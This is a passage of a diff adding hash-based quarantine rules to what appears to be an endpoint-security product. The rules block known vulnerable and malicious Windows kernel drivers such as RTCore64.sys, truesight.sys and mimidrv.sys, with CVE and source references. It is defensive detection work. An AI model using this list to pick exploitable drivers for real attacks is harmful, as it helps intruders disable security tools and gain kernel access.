"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": 
"b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.478700Z", + "creation_date": "2026-03-23T11:45:30.478703Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.478712Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d0eb3ba0aff471d19260192784bf9f056d669b779b6eaff84e732b7124ce1d11", + "comment": "Vulnerable Kernel Driver (aka Tmel.sys) [https://www.loldrivers.io/drivers/1aeb1205-8b02-42b6-a563-b953ea337c19/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "18295421-b601-52d1-b06a-e7aa6e8e0d1c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.604337Z", + "creation_date": "2026-03-23T11:45:29.604339Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.604345Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7823833a22e11345c69d0c9687b3b75e0043492ed9546d6300a3f63017384538", + "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"182dcb61-f882-5f5e-bfc8-ade442ab6e2f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.488656Z", + "creation_date": "2026-03-23T11:45:31.488658Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.488663Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5951c107f2e358e96be1341b367d38e2a644453ba349f497efcb543a1d89c8fe", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "182ea10a-b8cf-5a22-8dad-09f0269a484b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.491061Z", + "creation_date": "2026-03-23T11:45:31.491064Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:31.491073Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7b3b9cbf31ed921cebf444b37d3e5a9c1b4edde8d69e1e33dbe9b4b0281ac406", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1833432c-cb1b-5089-a8ea-a00aef65c44f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.488863Z", + "creation_date": "2026-03-23T11:45:31.488865Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.488880Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cbc56a38483d9fed6030a5f5b4b2a913ed09db6f4166ed18bb3ea2377947d39b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "183b323f-567b-51ba-b497-5d19adda5df4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": 
"quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.825041Z", + "creation_date": "2026-03-23T11:45:31.825043Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.825048Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2e76abdf16b55e8e568a2a70f89eaa57edcf57538c082054197f6a48a313386c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "183bd5de-b815-5e2a-b644-b00596788964", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.834463Z", + "creation_date": "2026-03-23T11:45:30.834466Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.834475Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ea97ff8adb3ca8abca38cefabc8885f220dc2e937b9af1aa37afdf3b1ca87797", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1853095e-019d-5e98-a5e8-a7b5fe2d0232", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.459385Z", + "creation_date": "2026-03-23T11:45:30.459389Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.459397Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "db1dbb09d437d3e8bed08c88ca43769b4fe8728f68b78ff6f9c8d2557e28d2b1", + "comment": "Vulnerable Kernel Driver (aka netfilter2.sys) [https://www.loldrivers.io/drivers/5ad8a3b6-6d20-4c95-8fa7-9a507167ba3c/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "185f5d80-f41c-5061-93df-721f71c369d4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.619054Z", + "creation_date": "2026-03-23T11:45:29.619056Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.619062Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b1b708dd7b10616693fd6b56e0b47d9fa6b90f9db28cbf3893b815222e2fa2e5", + "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "18759823-b744-5986-874d-9db2951e6aed", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.615434Z", + "creation_date": "2026-03-23T11:45:29.615436Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.615441Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"7fa5c326b294f4fc537207a27947c2fcbbfa4eabde1ba4727c92cd8613e0fc7f", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1875b6fb-099c-5b12-a371-719047524fd8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.150194Z", + "creation_date": "2026-03-23T11:45:31.150196Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.150201Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "198ad963612c57f44158156a0142cc607d867fc7d478a0aaf711d0bdd131e2db", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "18867532-5a88-5a89-a010-a7db15a44a80", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + 
"id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.975992Z", + "creation_date": "2026-03-23T11:45:29.975994Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.975999Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3a9e1d17beeb514f1b9b3bacaee7420285de5cbdce89c5319a992c6cbd1de138", + "comment": "SystemInformer driver (aka systeminformer.sys, formerly known as kprocesshacker.sys) [https://github.com/winsiderss/systeminformer] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "188c4aef-614b-503e-8a62-2505f8dfc3ce", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.485135Z", + "creation_date": "2026-03-23T11:45:31.485138Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.485147Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1e1a8f5f9657c32d55a36cae3071dd874b0504f645d37e633d65a313192075ee", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "188c502e-fe31-584d-9125-47d31962df38", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.153942Z", + "creation_date": "2026-03-23T11:45:31.153944Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.153958Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1d70eb4feb73020f17d62933062b0bdb47aa2e236f868c2f2beb492810811f24", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "188d63e0-66f7-5911-aab0-fa797b425113", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.145318Z", + "creation_date": 
"2026-03-23T11:45:32.145321Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.145329Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "507b07b0dc0e638b65b4a4d11a462b35439c746d42337b9888927bf994176102", + "comment": "Vulnerable Kernel Driver (aka SeasunProtect.sys) [https://www.loldrivers.io/drivers/3a9ea9a6-e5e3-439a-b892-1f78dd990099/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1893c7d6-1896-5c6b-9f9c-7d87295dddfe", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.453753Z", + "creation_date": "2026-03-23T11:45:30.453757Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.453766Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b40db5bb6a76ca9aed98366dc19f0c31c50b3f0ac96e0f615e4c52abb6bb0cde", + "comment": "Vulnerable Kernel Driver (aka nicm.sys) [https://www.loldrivers.io/drivers/86cff0de-2536-4b8d-a846-a7312c569597/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "189ae851-081f-50bb-b7c1-ec5ff0f47672", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + 
"test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.982818Z", + "creation_date": "2026-03-23T11:45:29.982821Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.982826Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c60fcff9c8e5243bbb22ec94618b9dcb02c59bb49b90c04d7d6ab3ebbd58dc3a", + "comment": "Vulnerable Kernel Driver (aka ProxyDrv.sys) [https://www.loldrivers.io/drivers/0e3b0052-18c7-4c8b-a064-a1332df07af2/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "189d3e7e-3e66-5788-a2e8-55d558a5de9c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.816302Z", + "creation_date": "2026-03-23T11:45:30.816304Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.816309Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5fae7e491b0d919f0b551e15e0942ac7772f2889722684aea32cff369e975879", + "comment": "Vulnerable Kernel Driver (aka ngiodriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "18a4d7e9-4210-500b-ab17-7ad4c85fd9bf", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.610405Z", + "creation_date": "2026-03-23T11:45:29.610407Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.610413Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4d19ee789e101e5a76834fb411aadf8229f08b3ece671343ad57a6576a525036", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "18a75389-90d1-528a-ae72-23353bc13875", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.470922Z", + "creation_date": "2026-03-23T11:45:30.470926Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.470935Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "683936955d7e3281573fcbaa149fc384a06dc4a12cd67ce601aba2f1a32b19c3", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "18a87291-bce2-5380-974e-a892e7d75199", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.821051Z", + "creation_date": "2026-03-23T11:45:31.821054Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.821062Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d67133fb200fb009235f10e7f87674f627c65d1320b63d22dff10dc9efe00e41", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "18aa80c8-228a-5db4-84b2-164dab9da9dd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.815629Z", + "creation_date": "2026-03-23T11:45:30.815632Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.815638Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0f30ecd4faec147a2335a4fc031c8a1ac9310c35339ebeb651eb1429421951a0", + "comment": "Vulnerable Kernel Driver (aka RadHwMgr.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "18b8d519-5e8c-54c5-82cf-ab7ab90f922d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.460350Z", + "creation_date": "2026-03-23T11:45:30.460354Z", + "enabled": true, + 
"block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.460362Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "613d6cc154586c21b330018142a89eac4504e185f0be7f86af975e5b6c046c55", + "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "18c67298-9ca1-5c9a-8409-b253515f4e81", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.615640Z", + "creation_date": "2026-03-23T11:45:29.615642Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.615648Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "eae8045d43f16e33232fd8bd2399f48b14f8a6391c9fffe38960c03fee978b27", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "18e872fd-a45a-5812-941d-2608f99a740e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + 
